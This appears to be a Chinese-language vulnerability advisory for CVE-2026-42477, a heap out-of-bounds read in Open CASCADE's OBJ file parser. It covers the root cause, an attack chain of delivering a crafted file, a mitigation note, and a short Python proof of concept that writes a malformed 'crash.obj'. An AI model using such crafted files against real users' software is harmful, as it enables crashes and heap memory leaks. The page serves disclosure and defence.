CVE-2026-42477 CVSS 7.1 高危

CVE-2026-42477 Open CASCADE越界读取漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42477

漏洞类型

堆越界读取

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Open CASCADE Technology (OCCT)

漏洞概述

Open CASCADE Technology (OCCT) V8_0_0_rc5版本的OBJ文件解析器RWObj_Reader::read组件中存在堆越界读取漏洞。由于Standard_ReadLineBuffer::ReadLine()可能返回1字节缓冲区，而后续代码在未验证长度的情况下直接调用pushIndices(aLine + 2)，导致越界访问。攻击者可诱导受害者打开特制OBJ文件，引发拒绝服务或敏感信息泄露。

技术细节

该漏洞位于Open CASCADE Technology (OCCT)库的OBJ文件解析模块中。根本原因是RWObj_Reader::read函数在处理输入行时缺乏必要的边界检查。具体流程为：当解析器读取到一个极短的OBJ行（例如仅包含1个字符）时，Standard_ReadLineBuffer::ReadLine()仅返回一个大小为1字节的缓冲区。然而，RWObj_Reader::read()未检查该缓冲区长度，直接执行指针偏移操作pushIndices(aLine + 2)，试图访问缓冲区范围之外的地址。这种堆越界读取行为属于内存安全违规。攻击者利用此漏洞，一方面可能导致应用程序异常终止（拒绝服务），另一方面可能通过读取超出边界的内容，从堆内存中获取敏感信息，如指针地址或其他运行时数据。由于需要用户交互，攻击通常通过分发恶意文件进行。

攻击链分析

STEP 1

构建恶意文件

攻击者创建包含特定格式内容的特制OBJ文件，利用解析器对最小行处理的缺陷。

STEP 2

传递恶意文件

通过电子邮件、文件共享或其他方式将特制的OBJ文件发送给目标受害者。

STEP 3

诱导用户交互

诱导受害者使用易受攻击版本的Open CASCADE Technology软件打开该恶意文件。

STEP 4

触发漏洞

软件解析OBJ文件时，RWObj_Reader::read函数执行越界读取操作，导致内存数据泄露或程序崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys

# PoC for CVE-2026-42477: Heap OOB Read in OCCT
# Generates a crafted OBJ file that triggers the vulnerability
# when the parser expects more than 1 byte to perform aLine + 2 offset.

def generate_malicious_obj(filename):
    # The vulnerability occurs when ReadLine returns a 1-byte buffer
    # but the code calls pushIndices(aLine + 2).
    # We construct a line that is minimal.
    with open(filename, 'w') as f:
        # Write a valid header to ensure it's parsed as OBJ
        f.write("# Malicious OBJ for CVE-2026-42477\n")
        # Attempt to trigger the short read condition
        # If a line is just "v" (1 byte) + newline, ReadLine might return "v".
        # pushIndices("v" + 2) -> OOB Read.
        f.write("v\n") 
        # Add some dummy data to ensure file structure
        f.write("o object\n")
        f.write("f 1 2 3\n")

if __name__ == "__main__":
    generate_malicious_obj("crash.obj")
    print("[*] Created crash.obj. Open it with OCCT V8_0_0_rc5 to trigger.")

影响范围

Open CASCADE Technology (OCCT) V8_0_0_rc5

防御指南

临时缓解措施

在官方补丁发布之前，建议用户不要打开来源不明的OBJ文件，并在沙箱环境中处理不可信的3D模型文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表